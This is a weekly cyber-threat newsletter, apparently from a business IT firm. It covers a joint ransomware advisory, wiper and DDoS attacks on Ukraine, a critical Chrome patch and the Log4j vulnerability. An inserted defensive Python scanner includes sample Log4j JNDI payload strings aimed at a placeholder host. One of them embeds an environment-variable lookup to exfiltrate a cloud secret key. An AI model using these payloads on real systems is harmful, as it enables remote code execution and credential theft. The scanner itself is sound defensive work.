Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which we bring attention to the latest cyber attacks and threats including Ransomware and DDoS, in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:


Ransomware surge prompts joint NCSC, CISA warning to safeguard systems

An increase in “sophisticated, high-impact” ransomware incidents is posing a growing threat to critical infrastructure organisations, western government agencies warn.

The UK’s National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Cyber Security Centre recently published a joint advisory (PDF) highlighting the evolution of techniques deployed by cybercriminals and the growing maturity of the ransomware-as-a-service business model.

In their advisory, the agencies report that ransomware peddlers have begun sharing victim information with each other, diversifying the threat to targeted organisations:

For example, after announcing its shutdown, the BlackMatter ransomware group transferred its existing victims to infrastructure owned by another group, known as Lockbit 2.0. In October 2021, Conti ransomware actors began selling access to victims’ networks, enabling follow-on attacks by other cyber threat actors.

Ransomware groups have increased their impact by targeting managed service and cloud infrastructure providers, according to the NCSC and other members of the Five Eyes intel sharing alliance.

“Ransomware developers targeted cloud infrastructures to exploit known vulnerabilities in cloud applications, virtual machine software, and virtual machine orchestration software,” according to the joint advisory.

“Ransomware threat actors also targeted cloud accounts, cloud application programming interfaces (APIs), and data backup and storage systems to deny access to cloud resources and encrypt data.”

Chris Boyd, senior threat researcher at Malwarebytes, commented: “The shift away from so-called ‘big-game’ targets to smaller entities because of generating too much heat from major ransomware outbreaks could spell trouble for SMEs, as ransomware groups redouble their efforts on organisations which may not have the security budget to withstand sustained, aggressive attacks.”

UK and Australian organisations reported that enterprises of all sizes continue to be targeted with ransomware attacks.

Industry representatives told The Daily Swig that Hive, Sodinokibi (AKA REvil), Conti, Phobos, and Khonsari are among the most common ransomware strains by volume at present.

“In terms of volume/in-field submissions these are the top five, but bear in mind some of the big game hunters will not have the volume,” Raj Samani, chief scientist at Trellix, explained.

In their joint advisory, intel agencies offer guidance on preventing attacks. This includes segmenting networks, making regular backups, patching, network monitoring, and tightening authentication controls, among other security enhancements.

In addition to this advice, Neuways would recommend working with an external Cyber Security resource that has expert knowledge of the latest threats and the techniques which must be implemented to protect against them.

‘Wiper’ attack discovered in latest Ukraine cyber-attacks

Ukraine has been hit by more cyber-attacks, which its government says are “on a completely different level”.

Earlier last week, the websites of several Ukrainian banks and government departments became inaccessible. At the same time, a new “wiper” attack, which destroys data on infected machines, was discovered being used against Ukrainian organisations.

The incident represents the third wave of attacks against Ukraine this year and the most sophisticated to date. The latest attack began on Wednesday afternoon when internet connectivity company NetBlocks tweeted about the outages, saying, “the incident appears consistent with recent DDoS attacks”.

Distributed denial of service (DDoS) attacks are designed to knock a website offline by flooding it with huge amounts of requests until it crashes.

There are continuing reports from Ukraine that mass DDoS attacks on the country have begun, with NetBlocks data suggesting they are intensifying in severity.

It is important to say that no official blame has been directed at Russia for the latest attacks, and most websites were restored within a few hours.

On Wednesday night, cyber-security experts at ESET and Symantec then said they had recorded a second form of attack on computer systems using a sophisticated “wiper” malware. “ESET researchers have announced the discovery of a new data wiper malware used in Ukraine, which they have named HermeticWiper,” a spokesman said.

“ESET telemetry shows that the malware was installed on hundreds of machines in the country.”

The US, UK and EU have also blamed Russia for the hugely disruptive NotPetya “wiper” attack, which started in Ukraine but spread globally, causing billions of dollars of damage to computer systems across Europe, Asia, and the Americas.

Moscow denies being behind the attack, calling such claims “Russophobic”, but Neuways and the National Cyber Security Centre would advise businesses to continue to be vigilant against the growing cyber threat across the world. Cyber resilience and cyber security must be a priority for every organisation now and in the future.

Google Patches Critical Vulnerability With Chrome 99 Update

A Chrome 99 update released by Google on Tuesday (16th March) patches a critical vulnerability discovered by one of the company’s own researchers. The critical flaw, tracked as CVE-2022-0971, has been described as a use-after-free issue affecting the Blink Layout component.

Google doesn’t often assign a “critical severity” rating to Chrome vulnerabilities. In fact, over the past year, only four other Chrome updates fixed a critical issue. Two of the four critical vulnerabilities were discovered by Glazunov, who has also identified a high-severity bug that was patched this week.

The latest Chrome update includes 11 security fixes, including eight with a “high severity” rating. These flaws, which can typically allow a sandbox escape or remote code execution, are mostly use-after-free issues.

The internet giant said that it paid out nearly £8 million in bug bounties last year, including roughly £2.7 million for Chrome vulnerabilities.

There has been a surge in Chrome vulnerabilities exploited in the wild, with 14 zero-days exploited in 2021, far more than any other popular web browser.

Google last week attempted to explain this trend, naming several factors that have apparently contributed. The list includes more transparency regarding active exploitation, increased complexity of the browser, the need to chain multiple flaws for a useful exploit, and attackers increasingly targeting the browser itself following the death of Flash, their former favourite target.

Again, patching is an ever-evolving task, and that isn’t going to change anytime soon. Businesses (and users) need to make a cultural shift towards patch management being a day-to-day activity, just as phishing awareness training is now becoming part of the daily job of every employee in order to ensure a company’s cyber resilience.

Log4j bug will be with us for years

December of 2021 will be looked back on with a tinge of trauma and dread by incident responders, system administrators and security practitioners. On 9th December, a remote code execution vulnerability [CVE-2021-44228] was uncovered in the Log4j logging library, which is nearly ubiquitous in Java applications and software used all across the internet.

It felt like this vulnerability affected, well, everything. On top of that, it was very difficult to determine what applications were vulnerable and from what entry point.

The CVE-2021-44228 Log4j vulnerability offers initial access, which means hackers can then perform all the disruption, degradation and potential destruction they wish. Coupled with other vulnerabilities and exploitation techniques, even more damage could be done.

One recent vulnerability of note is CVE-2021-4034, the “PwnKit” bug affecting the Polkit pkexec utility. It was present on a significant number of Linux distributions and easily elevated any low-privilege user to root (administrator) access. Weaponising both the trivial Log4j vulnerability for initial access and the trivial pkexec vulnerability for privilege escalation could lead to easy mass compromise of Linux servers if they are not patched.

Needless to say, patching was, is and always will be the utmost priority. In the case of Log4j, some individuals thought that using an up-to-date version of Java, rather than the individual Log4j library would be enough. This was quickly proved to not be the case, and the attack chain was made publicly available in the JNDI-Exploit-Kit project on GitHub.

If the vulnerable Log4j library is not patched, there is still a risk even if initial access is not possible. The syntax used to pull off the attack relies on an outbound connection, reaching out via the LDAP protocol to retrieve a Java class hosted elsewhere. In that outbound connection request, the attacker could exfiltrate sensitive information potentially stored in environment variables.
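As an added example (not from the original article), here is a defender-side check for the lookup syntax described above: a small Python scanner that statically unwraps nested Log4j `${...}` lookups in log lines, without performing any real lookup, and flags lines that resolve to a JNDI lookup or that reference environment variables. The sample lines are constructed for illustration, and the hostname used in them is a placeholder.

```python
import re

# Matches the innermost ${...} that contains no further $, { or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def resolve(inner: str, lookups: list) -> str:
    """Statically evaluate one innermost lookup the way Log4j's string
    substitution would: lower:/upper: transforms and ${name:-default}
    defaults are applied, every other lookup is recorded and replaced by
    an inert <marker> so it cannot be expanded again."""
    if inner.startswith("lower:"):
        return inner[6:].lower()
    if inner.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:                       # ${x:-default} -> default
        return inner.split(":-", 1)[1]
    lookups.append(inner)                   # jndi:, env:, sys:, date:, ...
    return "<" + inner + ">"


def analyse(line: str) -> dict:
    """Return whether the line resolves to a JNDI lookup, which lookups
    would read process state (env:/sys:), and the normalised text."""
    lookups, text = [], line
    for _ in range(50):                     # bound work on hostile input
        new = INNERMOST.sub(lambda m: resolve(m.group(1), lookups), text)
        if new == text:
            break
        text = new
    jndi = any(l.lower().startswith("jndi:") for l in lookups)
    exfil = [l for l in lookups if l.lower().startswith(("env:", "sys:"))]
    return {"jndi": jndi, "exfil_lookups": exfil, "normalized": text}


# Constructed sample log lines; lookup.example is a placeholder host.
SAMPLE_LINES = [
    "GET /index.html HTTP/1.1",
    "GET /?q=${jndi:ldap://lookup.example/a} HTTP/1.1",
    "UA: ${${lower:j}${upper:n}di:ldap://lookup.example/a}",
    "UA: ${jndi:ldap://lookup.example/${env:AWS_SECRET_ACCESS_KEY}}",
    "UA: ${date:yyyy}",
]


def scan(lines):
    """Return (line, result) for every line that resolves to a JNDI lookup."""
    return [(ln, r) for ln in lines if (r := analyse(ln))["jndi"]]


if __name__ == "__main__":
    for ln, r in scan(SAMPLE_LINES):
        print("JNDI lookup:", r["normalized"], "exfil:", r["exfil_lookups"])
```

Matching on the normalised text rather than the raw line is what catches the nested and case-shifted variants; the `exfil_lookups` field is the signal for the environment-variable risk the paragraph describes.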

As the cybersecurity industry moves through 2022, the Log4j nightmare feels like it might be confined to the annals of history, but it’s not quite behind us just yet.

Most cyber security experts believed that after applying a patch or two to the previous Microsoft Exchange vulnerability, ProxyLogon, it would disappear. But almost instantly, the threat actors flung ProxyShell at us, taking many by surprise. And while ProxyShell/ProxyLogon ended up not being quite as significant as Log4Shell, these vulnerabilities still prove that threat actors love to recycle and level up a good threat whenever they can.

Considering just how deeply embedded the use of the Log4j package could be within applications, this vulnerability could continue to rear its head for many years to come. Much like the old Shellshock bug, some vendors or software providers might not even know the issue exists until it is discovered externally somewhere down the road.

Neuways urges businesses to ensure all patches are up to date and installed and that cyber security and cyber resilience measures are under constant review.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.